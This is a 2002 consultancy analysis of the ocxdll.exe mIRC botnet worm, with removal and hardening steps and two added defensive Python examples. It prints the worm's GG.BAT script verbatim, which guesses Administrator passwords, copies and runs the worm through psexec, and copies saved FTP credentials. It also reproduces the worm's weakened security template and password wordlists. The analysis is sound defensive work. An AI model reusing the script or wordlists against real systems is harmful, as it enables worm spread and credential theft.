KLC Consulting, Inc.
Information Security Services
info@klcconsulting.net 

mIRC (port 445) Trojan Analysis


mIRC Virus / Worm / Trojan Analysis (ocxdll.exe, Taskmngr.exe, mdm.exe, "HideWindows Error")

URL of this article is: http://www.klcconsulting.net/mirc_virus_analysis.htm

The KLC Consulting Security Team believes this is a prototype: the start of malicious IRC botnet Distributed Denial of Service (DDoS) attacks from the bad guys. This article gives a fundamental understanding of how IRC-based botnet DDoS Trojans spread so quickly.

------------------------------------------
Author:
------------------------------------------

Kyle Lai, CISSP, CISA

KLC Consulting, Inc.

klai@klcconsulting.net 

www.klcconsulting.net 

------------------------------------------
Content
------------------------------------------
- ocxdll.exe / mIRC Trojan Analysis Part 1
- ocxdll.exe / mIRC Trojan Analysis Part 2
- Trojan Removal and Protection tools
- Summary
- Trojan Files List
- An analysis on another IRC worm/Trojan (Deloder), more malicious than ocxdll.exe
------------------------------------------

------------------------------------------
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 1:

------------------------------------------

More Analysis on ocxdll.exe virus: v. 1.1

Kyle Lai, CISSP, CISA
klai@klcconsulting.net


+++++++++++++++++++++
This is an SMB over TCP attack on port 445. It looks for weak local Administrator IDs and passwords on Windows 2000 systems.
+++++++++++++++++++++

One of my clients also got infected with the ocxdll.exe virus. After some detailed analysis, I determined that it was a Trojan, deleted the detected registry entries, deleted the infected files, tightened the local administrator ID and password, restored the security policy by running "secedit.exe /configure" (from Microsoft) (if you have a backup .sdb file, just reapplying the security policy will fix this part), and added users/groups back to the "Access this computer from the network" policy. The cause was bad security (admin ID and passwords), the firewall, and possibly a backdoor.

Affected systems:
- Windows 2000 and XP (same port, 445, but XP not tested yet). The security policy alteration was ONLY observed on Windows 2000 (and maybe on XP).
- Windows NT might be the "root" system from which the Trojan spreads, but it will not receive this Trojan given the Trojan's distribution method. You should still examine NT systems to determine whether there are backdoors or Trojans, or whether the system was compromised in any other way. The Trojan does not change NT security policies.

What did it do?
++++++++++++
1. Hides every program it runs.
2. Runs the mIRC client under a random nickname taken from mdm.scr, with extra random characters appended.
3. Opens a backdoor on port 60609.
4. Loads the bot (robot) scripts in the following order (the [rfiles] list below); these contain the malicious automated instructions.
[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replaces the security policy settings using the Microsoft security editor (secedit.exe /configure): it resets the policy to the default settings and then applies the additional settings in the TFTP8675 file. This runs in quiet mode, so at most a command window flashes briefly.

6. Scans 25 IP addresses and then runs "GG.BAT" against them. GG.BAT is the program that actually does the hacking.

7. GG.BAT tries to log in to each target with the following user IDs and passwords. If none of your systems use these, you probably have a single infected system and the Trojan/worm could not spread further:

a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password

8. If any system had a guessable Administrator ID and password, it was probably hacked successfully. The Trojan copies OCXDLL.EXE to each compromised system, overwriting any existing copy, and does so quietly (psexec.exe -c -f -d).

9. Runs OCXDLL.EXE without waiting for it (psexec.exe -d), which extracts the 17 files in this self-extracting archive.

10. Copies "c:\progra~1\flashfxp\sites.dat" and "c:\progra~1\ws_ftp\ws_ftp.ini" (the saved FTP site profiles of FlashFXP and WS_FTP, including stored credentials) into the system32 directory on the remote system, named after the victim's IP address (see GG.BAT below).

11. Starts "taskmngr.exe", which is really mirc.exe, an IRC client.

12. The scripts then HIDE the mIRC window, so you can ONLY see it in the process list, as "taskmngr.exe" (NOT taskmgr.exe, which is the REAL Task Manager).

13. xvpll.hlp reports the Trojan's status back to the hacker: attempt failed or attempt successful.
++++++++++++
Disclaimer: The IRC bot scripts have not been fully analyzed. This is what I understand so far. The removal instructions WILL remove the Trojan.
++++++++++++

 

Impact:
+++++++++++++
This may be a random attack. However, one of the files involved, ncp.exe, is the NetCat program, which gives the hackers full remote control of your system.
Therefore:
1. Best-case scenario: it was a random attack by the Trojan and no sensitive data was lost. Your systems may still be used as zombies for Distributed Denial of Service attacks.

2. Worst-case scenario: they have taken control of your system and installed something new that is not yet detected.

3. The hacker has captured your IP address and knows that you were vulnerable, because the Trojan reported back to him/her. They have the account they successfully compromised, they *could* have obtained a copy of the users and passwords on that system, and *maybe* credit card information if you shop online.
+++++++++++++

How to remove the Trojan:
++++++++++++++++++++
1. Delete ocxdll.exe, the files extracted from it, and dll16.ini (created when mirc.exe runs):

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (batch file that hacks the next systems and copies the Trojan)
httpsearch.ini (might show up as httpsear.ini due to the 8.3 file name format)
kill.exe (kills processes)
mdm.exe (hide-window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

++++++++++++****NOTE:
seced.bat is a decoy and was never used; the real policy change is the secedit command described in item #5 above. v.exe is actually srvany.exe, another decoy that was never used.
++++++++++++

2. In HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, remove the "taskmngr.exe" entry (this starts the mIRC client at Windows startup).

3. Change the LOCAL Administrator password on ALL systems! This includes Windows 2000 PROFESSIONAL! Make sure the new passwords are strong: use a mix of uppercase, lowercase, numbers and non-alphanumeric characters (e.g. _ + = ) ?), and make sure the password is NOT similar to the Administrator ID in any way. For example, "Administrator123" is a very bad password, even though it has mixed case and digits.

4. If possible, rename the Administrator login ID to a different user ID. This stops the initial user ID guessing (it will not stop more sophisticated hackers).

5. Restore the default security policy by reapplying Microsoft's basic default security template. The following instructions are from a USENET posting by Edward Alfert (edward@alfert.com) under the topic "Solution to mIRC and Secedit Virus Networking Problems." in microsoft.public.scripting.virus.discussion. More information on the Microsoft Security Configuration and Analysis tool can be found at
http://www.microsoft.com/windows2000/en/advanced/help/default.asp?url=/windows2000/en/advanced/help/SCE_newconfig.htm

Here are the instructions from Edward Alfert.
================

1) use the backup security database template to restore the system to its original microsoft defaults. (NOTE...if you upgrade from a previous OS, this default may not be the default you are used to)...

cd %windir%\security\templates

Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log /verbose

2) copy /winnt/security/database/secedit.sdb to /winnt/security/database/secedit-check.sdb

you need to do this because you can't run step #3 against the original secedit.sdb

3) click on start, run, type mmc and click ok

4) click Console menu, then Add/Remove Snap-In

5) click Add, then double click on "Security and Configuration Analysis" and "Security Templates", then click close, and ok.

6) right click on "security and configuration analysis" and click on "open database"... browse to /winnt/security/database/secedit-check.sdb and select it.

7) right click on "security and configuration analysis" and select "analyze computer now"

8) browse through the directory structure and you will see that the computer is currently configured differently..

Make changes as appropriate for your environment.

For example, a very important option that is probably missing (as caused by the trojan) is that nobody is allowed to logon to the computer via the network.
================

6. Go to Start -> Programs -> Administrative Tools -> Local Security Policy, click "User Rights Assignment", and add users and groups back into the "Access this computer from the network" policy. The default setting is:

a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[SYSTEM_NAME]

7. You MUST go through the security policies and make sure proper access is restored. You or some of your applications may have had specific rights settings before the compromise, and user/group privileges and rights need to be reset where necessary.

8. You have probably seen a strange SID that the Trojan added to the "Log on locally" policy. Remove that SID. Its presence does NOT mean the Trojan created a user; it came from the security template in the TFTP8675 file, shown at the bottom of this document.

Additional Recommendation
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside to outside, and outside to inside. Make sure port TCP/UDP 445 is blocked both inbound and outbound on the firewall.

2. If possible, Rename your administrator user id to something else, and create a user id called "Administrator" with NO GROUPS associated with it. This will allow you to monitor anyone from trying to use the "Administrator" login.

3. Set up security event logging. Log successful and failed logon/logoff events to audit system access, and make sure someone monitors the event logs.
++++++++++++++++++++

More details:
Infection:
Registry entry
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, "taskmngr.exe" (this starts the mIRC client at Windows startup; remove it).

When the mIRC client started, it ran the scripts in dll32nt.hlp, which in turn ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+tftp8675 /quiet". This means "configure the system with the existing security policy in secedit.sdb plus the additional settings in tftp8675". It removed many security restrictions, turned off all auditing on the system, and of course removed every user and group from "Access this computer from the network".

OCXDLL.EXE is a self-extracting archive containing 17 files. It is a Trojan/worm. dll32nt.hlp contains instructions to scan for IP addresses and store the 25 it finds, most likely by scanning the subnet and the file servers the compromised system was connected to at the time. The script then runs GG.BAT, which attacks the 25 IPs it just found, and the process starts all over again.

Here are the files that were extracted from ocxdll.exe:
+++++++++++++++++++++++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++++++++++++++

Here is the GG.BAT text:
------------------------
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
------------------------

-------------------------------------
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive applications.
---------------------------------------
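GG.BAT leaves a distinctive trace in the security log of every host it touches: a burst of failed network logons (logon type 3) against "administrator", "root" and "admin" from one source address, sometimes followed by a success. The following Python is an added example, not part of the original KLC analysis, that spots that pattern. The pipe-separated record format and the sample records are constructed for this example (real Windows 2000 event text looks different); the 60-second window and the failure threshold are this example's own choices. Event IDs 529 (logon failure: unknown user name or bad password) and 528 (successful logon) are the Windows 2000 security-log IDs.

```python
r"""Detect the GG.BAT logon pattern in Windows 2000 security-log records.

Added example; not code from the original KLC page.  Record format, sample
records, window and thresholds are constructed/assumed for this example.
Event IDs: 529 = logon failure (bad user name or password), 528 = successful
logon; logon type 3 = network logon, which "net use \\host\ipc$" produces."""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts GG.BAT tries (see the batch file above).
GG_BAT_ACCOUNTS = {"administrator", "root", "admin"}

# Constructed sample log: timestamp|event_id|logon_type|account|source_ip
SAMPLE_LOG = """\
2002-08-27 03:14:01|529|3|administrator|10.1.1.50
2002-08-27 03:14:01|529|3|administrator|10.1.1.50
2002-08-27 03:14:02|529|3|root|10.1.1.50
2002-08-27 03:14:02|528|3|admin|10.1.1.50
2002-08-27 03:15:10|529|3|jsmith|10.1.1.7
2002-08-27 03:20:00|528|2|jsmith|10.1.1.7
"""


def parse_log(text):
    """Parse the constructed pipe-separated records into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, account, src = line.split("|")
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "account": account.lower(),
            "src": src,
        })
    return events


def find_spray_sources(events, window=timedelta(seconds=60), min_failures=3):
    """Return {source_ip: summary} for sources whose network logons look like
    GG.BAT: a burst of failures against a few accounts, possibly followed by
    a success (the account GG.BAT got in with)."""
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3:  # network logons only; GG.BAT uses net use
            by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs if e["event_id"] == 529]
        if len(failures) < min_failures:
            continue
        if failures[-1]["time"] - failures[0]["time"] > window:
            continue  # slow, spread-out failures are not this worm
        first = failures[0]["time"]
        successes = [e for e in evs if e["event_id"] == 528 and e["time"] >= first]
        accounts = {e["account"] for e in evs}
        findings[src] = {
            "failures": len(failures),
            "accounts": sorted(accounts),
            # only the worm's three account names were tried
            "matches_gg_bat": accounts <= GG_BAT_ACCOUNTS,
            "compromised_account": successes[0]["account"] if successes else None,
        }
    return findings


if __name__ == "__main__":
    for src, summary in find_spray_sources(parse_log(SAMPLE_LOG)).items():
        print(src, summary)
```

A source that shows up here with a non-empty compromised_account is the host GG.BAT was run from; treat it as infected and look for the file list above on it, not only on the target.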

List from TFTP8675:
----------------------
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Registry Values]
machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1
machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0
machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0
machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1
machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0
machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1
machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15
machine\system\currentcontrolset\control\session manager\protectionmode=4,1
machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0
machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0
machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1
machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1,
machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1,
machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0
machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0
machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14
machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10
machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0
machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0
machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0
machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0
machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0
[Privilege Rights]
seassignprimarytokenprivilege =
seauditprivilege =
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
sebatchlogonright =
sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0
secreatepagefileprivilege = *S-1-5-32-544
secreatepermanentprivilege =
secreatetokenprivilege =
sedebugprivilege = *S-1-5-32-544
sedenybatchlogonright =
sedenyinteractivelogonright =
sedenynetworklogonright =
sedenyservicelogonright =
seenabledelegationprivilege =
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501
seloaddriverprivilege = *S-1-5-32-544
selockmemoryprivilege =
semachineaccountprivilege =
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
seservicelogonright =
seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545
sesyncagentprivilege =
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544
setcbprivilege =
--------------------------


--------------------------------------------------------------------------------



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 2:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


More Analysis on IRC Virus/Trojan Part 2: By
++++++++++++++++++++
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
klai@klcconsulting.net
++++++++++++++++++++
++++++++++++++++++++++++++
Disclaimer:
First of all, I want to say that I have nothing against Microsoft. I am just presenting my analysis. This analysis is based on my examination of the IRC Trojan/virus as referenced in Microsoft Knowledge Base Article Q328691; however, I am not to be held responsible for the information provided. Also, I have not researched any of the previous IRC/flood Trojans/viruses; therefore, I am not knowledgeable in all aspects of that topic. If you think the information in this posting is not accurate, please send me an email.
+++++++++++++++++++++++++++

This IRC Trojan/virus is vaguely similar to the earlier IRC/flood Trojan/virus. This time, however, it takes advantage of weak system security and also causes a denial of service (DoS). The vulnerability is typically caused by a lack of corporate security awareness.

Just some comments to Microsoft's response:

1. It uses port 445 (SMB over TCP) for the attack. It does not use port 139, so NT4 is not vulnerable to this particular Trojan. Port 139 is, however, another typical target for hackers. Make sure your firewall is locked down, and if you don't have a firewall, get one!

2. OCXDLL.EXE is a self-extracting executable containing 17 files. To remove the Trojan completely, see my original analysis, which lists all the files that are "directly" involved
(http://groups.google.com/groups?q=solution+irc+virus&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com&rnum=4).
Again, I cannot tell whether the hackers added or deleted any files on your systems. Reason: once the hacker(s) compromised your machine(s), they own the entire system(s).

3. ncp.exe was included in ocxdll.exe. ncp.exe is actually the NetCat program, one of hackers' favorite tools. Microsoft did not identify this tool.

4. mt.exe is another program; it requires the Cygwin DLL. If you use the Linux emulation environment Cygwin, that DLL would already exist on your system.
In discussion with Symantec, one analyst said "mt.exe is just a rather old Unix bot named knight.c that has been recompiled to use cygwin and run on Windows. This is basically a DdoS bot." However, I cannot confirm this because I have never dealt with it before. In the scripts, I did not see any evidence of mt.exe being called; however, I wouldn't rule out the hacker executing this program remotely.

5. Microsoft said in article Q328691: "NOTE: Paths to the files are not listed because they may vary." This statement is correct; however, probably 99% (just a guess) of people run the default Windows 2000 configuration, which puts the files in "\WINNT\SYSTEM32". I suspect ocxdll.exe was copied to the folder where "services.exe" is located, because when I ran psexec.exe the way the script does, it started the process "services.exe" on the remote system, followed by "psexesvc.exe", then "services.exe" again. I did not have time to test this fully; if you can, keep me updated with your results. I could not find psexesvc.exe on my system, though. PSEXEC.EXE can be downloaded from Sysinternals (http://www.sysinternals.com/ntw2k/freeware/psexec.shtml).

Test procedure:
a. Download psexec.exe and save it at c:\test\.
b. Create a file called c:\test\test.bat with the following 2 lines:
   Echo done testing > test-1.txt
c. Type "Net Use \\[computer_ip]\IPC$ "[password]" /user:[administrator id]" to connect to the remote computer as a system admin.
d. Type "psexec \\[remote-system] -f -c -d test.bat -o" (to examine where the files are copied to).
e. Go to the remote system, "cd %systemroot%\system32", search for test*.* and you should find:
   i. test.bat
   ii. test-1.txt
f. Open test-1.txt; it contains the line "done testing", which proves that test.bat has been executed.

g. This shows how psexec.exe works, and how dangerous it is in a hacker's hands: psexec.exe copied test.bat over to the remote system and executed it right after it was copied.

6. It tried to create a file list for each of the following file types: .MPG, .AVI, .ASF, .RAR, .ZIP, .CUE. These instructions are in httpsearch.ini. Since the machines I examined had this file extracted from ocxdll.exe in 8.3 format ("httpsear.ini"), I don't believe this script was executed, and I did not see files such as:
a. listmpg.txt
b. listavi.txt
c. listasf.txt
d. listrar.txt
e. listzip.txt
f. listcue.txt
g. warezlist.txt
h. medialist.txt

You probably want to check for these files anyway.

7. My previous analysis contains the content of TFTP8675, the security template that was actually applied to the security settings. This template changed user permission/rights policies. There are 3 major discoveries:
a. Compared with the basic Microsoft default templates that ship with Windows 2000, the hacker used the exact basic Microsoft template but added the [Privilege Rights] section of the security template.

b. It tries to assign Guest the right to "log on locally". The entry was (seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501). *S-1-5-21-1960408961-1637723038-1801674531-501 is the Guest SID it tried to add to the system ("501", the last component of the SID, is the RID of the Guest account). On the systems I examined, the SID value did not change as it spread, which means Guest accounts were not added successfully.

c. The part where it replaced the "Access this computer from the network" policy is (senetworklogonright = Microsoft). I noticed that the designer of this Trojan/virus/malware used SIDs to assign every other user right except this one. I think he/she is trying to make a point (?)


I don't think there can be a conclusion on what was lost if the systems were compromised. However, we can be sure that port 445 is open and unprotected on many Windows 2000 and XP systems, and that many people are not security conscious about their Windows 2000 and XP systems, which require a bit more technical skill to lock down.

I highly recommend that system administrators follow the Microsoft security guidelines on hardening their Windows-based environment.

I would also suggest that everyone infected by a Trojan/virus run an anti-Trojan program in addition to anti-virus software. Anti-Trojan programs like Anti-Trojan (http://www.anti-Trojan.net), Pest Patrol (http://www.pestpatrol.com), and others ensure there are NO Trojan/hacker tools on your systems, which anti-virus programs sometimes miss.

Besides anti-Trojan software, you should probably run something like Ad-Aware (http://www.lavasoftusa.com/) to remove adware that was downloaded unintentionally while surfing the web.

I hope "Internet Security" is not an oxymoron.

Trojan Removal and Protection:

Here are some free software utilities that can help you fight Trojans and intrusions. If you use these utilities, make sure you get the latest updates regularly:

1. Make sure you have the latest anti-virus definitions from your anti-virus software vendor. If you don't have an anti-virus product, here is a free one: http://www.grisoft.com 

2. Make sure you get anti-Trojan software on top of the anti-virus software. Much anti-virus software does not detect Trojans and hacker tools installed during an intrusion, because those tools could be used legitimately by security professionals... A free and great one is Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html 

3. Get Ad-Aware, which removes advertising software that web advertisers install on your systems without your knowledge while you surf the Web... This is free software too: http://www.lavasoftusa.com/software/adaware/ 

4. Get a firewall for your computers if you do not have one. Here is a very simple-to-use firewall: http://www.zonealarm.com 

 

Summary:

This particular mIRC virus/Trojan spread across the world around the end of August 2002 (~8/27/2002).
Based on information from the victims, a variant of the original OCXDLL.EXE attacked again
around October 23, 2002 and November 13, 2002.

I have heard there is a new variant out there, and the new name for taskmngr.exe is now TASK32.EXE (as of 11/13/2002).
This was reported by several victims in the newbie.org "taskmngr.exe" discussion group I participated in.

This virus took advantage of Microsoft SMB over TCP (port 445, direct-hosted SMB without the NetBIOS session layer used on port 139).
It attempted to spread to Windows 2000 Professional, Windows 2000 Server and possibly Windows XP systems with
weak, guessable Administrator account passwords:

Account: Administrator
Passwords: [blank], admin, administrator, test, test123, temp, temp123, pass, password, changeme

Passwords used by the DeLoder-A worm/Trojan:
0, 000000, 00000000, 007, 1, 110, 111, 111111, 11111111, 12, 121212, 123, 123123, 1234, 12345, 123456, 1234567, 12345678, 123456789, 1234qwer, 123abc, 123asd, 123qwe, 2002, 2003, 2600, 54321, 654321, 88888888, a, aaa, abc, abc123, abcd, Admin, admin, admin123, administrator, alpha, asdf, computer, database, enable, foobar, god, godblessyou, home, ihavenopass, Internet, Login, login, love, mypass, mypass123, mypc, mypc123, oracle, owner, pass, passwd, Password, password, pat, patrick, pc, pw, pw123, pwd, qwer, root, secret, server, sex, super, sybase, temp, temp123, test, test123, win, xp, xxx, yxcv, zxcv, Admin, admin, root, root, test, test
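Removal step 3 above gives the password rules (mixed character classes, nothing resembling the Administrator ID, so "Administrator123" fails), and the lists above show what these worms actually try. The following Python is an added example, not the page's own code, that checks a proposed local Administrator password against both. MIN_LENGTH is this example's assumption, since the page states no number; DELODER_SAMPLE is a constructed excerpt of the DeLoder-A list above, not the complete list, and the "derived from the account name" test is this example's own interpretation of "not similar to the administrator ID in any way".

```python
"""Check a proposed local Administrator password against the rules in the
removal steps and against the passwords the ocxdll.exe (GG.BAT) and DeLoder-A
worms try.

Added example, not code from the original KLC page.  MIN_LENGTH is assumed;
DELODER_SAMPLE is a constructed excerpt of the list on the page."""
import re
import string

# The four credentials GG.BAT tries (blank, administrator, root, admin).
GG_BAT_PASSWORDS = {"", "administrator", "root", "admin"}
# Constructed excerpt of the DeLoder-A list reproduced above.
DELODER_SAMPLE = {
    "0", "000000", "007", "1", "111111", "12345", "123456", "1234qwer", "123abc",
    "abc123", "admin", "admin123", "administrator", "alpha", "changeme",
    "computer", "foobar", "god", "godblessyou", "ihavenopass", "login",
    "mypass", "mypass123", "mypc123", "oracle", "pass", "passwd", "password",
    "pw123", "root", "secret", "server", "sybase", "temp", "temp123", "test",
    "test123", "xp", "zxcv",
}
WORM_PASSWORDS = {p.lower() for p in GG_BAT_PASSWORDS | DELODER_SAMPLE}
MIN_LENGTH = 12  # assumption: the page asks for "strong" but gives no length


def check_password(password, account="Administrator"):
    """Return a list of rule violations; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)

    # Rule from removal step 3: uppercase, lowercase, digits and non-alphanumeric.
    classes = {
        "uppercase": any(c.isupper() for c in password),
        "lowercase": any(c.islower() for c in password),
        "digit": any(c.isdigit() for c in password),
        "non-alphanumeric": any(c in string.punctuation for c in password),
    }
    missing = [name for name, present in classes.items() if not present]
    if missing:
        problems.append("missing character class(es): " + ", ".join(missing))

    lowered = password.lower()
    if lowered in WORM_PASSWORDS:
        problems.append("appears in the worm password list")

    # "Administrator123" style: the account name (or a prefix of it such as
    # "admin") with digits or punctuation bolted on.  Case is ignored.
    letters_only = re.sub(r"[^a-z]", "", lowered)
    acct = account.lower()
    if acct in lowered or (len(letters_only) >= 4 and acct.startswith(letters_only)):
        problems.append("derived from the account name %r" % account)
    return problems


if __name__ == "__main__":
    for candidate in ("Administrator123", "admin", "Tr0ub4dor_&3xyz"):
        print(repr(candidate), check_password(candidate) or "OK")
```

Run the check for every local Administrator account on every Windows 2000 host you are cleaning, not just the one that was noticed first; GG.BAT only needs one machine on the subnet to still have a guessable password.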

Microsoft got caught up with the original OCXDLL.EXE virus/Trojan and issued a "Hacker Alert" on 8/30/2002. The original Microsoft analysis was very vague and was heavily criticized by the public. Microsoft re-issued the analysis under the title "MIRC Trojan-Related Attack Detection and Repair" on 9/6/2002 and removed the original article. Below are some references regarding this mIRC virus/Trojan/malware.

I am still helping out in the discussion group: newbie.org under "Taskmngr.exe".  There you can see the discussion and track the Trojan variants.

  1. Original Microsoft Knowledgebase Article Q328691 - Microsoft Hacker Alert posted 
    on Google Discussion Group (8/30/2002)

  2. Revised (current) Microsoft Knowledgebase Article Q328691 (9/6/2002) 

  3. Newbie.org website discussion - under the topic "taskmngr.exe" 

  4. Symantec Virus Analysis - trojan.ircbounce

  5. CNET - Microsoft "solves" hacking mystery

  6. Wired - Alert: Windows May Deny Users

  7. News Group - http://cert.uni-stuttgart.de/archive/isn/2002/09/msg00017.html

  8. OCXDLL.EXE includes the following files:
    --------------------------------------------
    ocxdll.exe - the worm/Trojan package, a self-extracting zip file. When executed, it unzips the following files into the Windows system32 directory.
    dll32.hlp - malicious mIRC script
    dll32NT.hlp - malicious mIRC script
    gates.txt - non-malicious script
    gg.bat - batch file called first to compromise systems. It contains the guessable user IDs and passwords and targets the \\[system]\IPC$ share.
    httpsearch.ini - malicious mIRC script
    kill.exe - program used to terminate processes; GG.BAT runs it on the target as "kill.exe temp.exe".
    mdm.exe - HideWindow program. It hides a window that would otherwise be seen; this is used to hide the mIRC program window.
    mdm.scr - list of nicknames used by this worm/Trojan when joining IRC.
    mt.exe - a rather old Unix bot named knight.c that has been recompiled with Cygwin to run on Windows.
    ncp.exe - NetCat program. This is usually used to remotely control a system.
    NT32.ini - malicious mIRC script
    psexec.exe - legitimate Sysinternals program that starts a process on a remote system.
    seced.bat - a decoy; this file was never used. Its commands would re-apply the original security policies, but would not undo the additional policies the worm/Trojan changed beyond the original set.
    taskmngr.exe - the mIRC program
    tftp8675 - the security template applied by the Trojan. This caused the denial of service discussed in Part 2 of the analysis.
    v.exe - a decoy; this file was never used. It is the SrvAny program from the Microsoft Resource Kit, which runs a program as a service.
    xvpll.hlp - malicious mIRC script
    --------------------
    Files from variants
    --------------------
    BACKUP.BAT - batch file called first to compromise systems. It contains the guessable user IDs and passwords and targets the \\[system]\IPC$ share.
    NT32.INI - malicious mIRC script.
    PSTOR.EXE - an exploit program that steals usernames and passwords stored via pstorec.dll (the Protected Storage used by IE and Outlook Web Access among others). PStor.EXE is actually the program pStoreReader (exploit); the .exe and source code are at http://intex.ath.cx. I first saw this variant on 10/23/2002.
    WINHP32.EXE - hide-window program
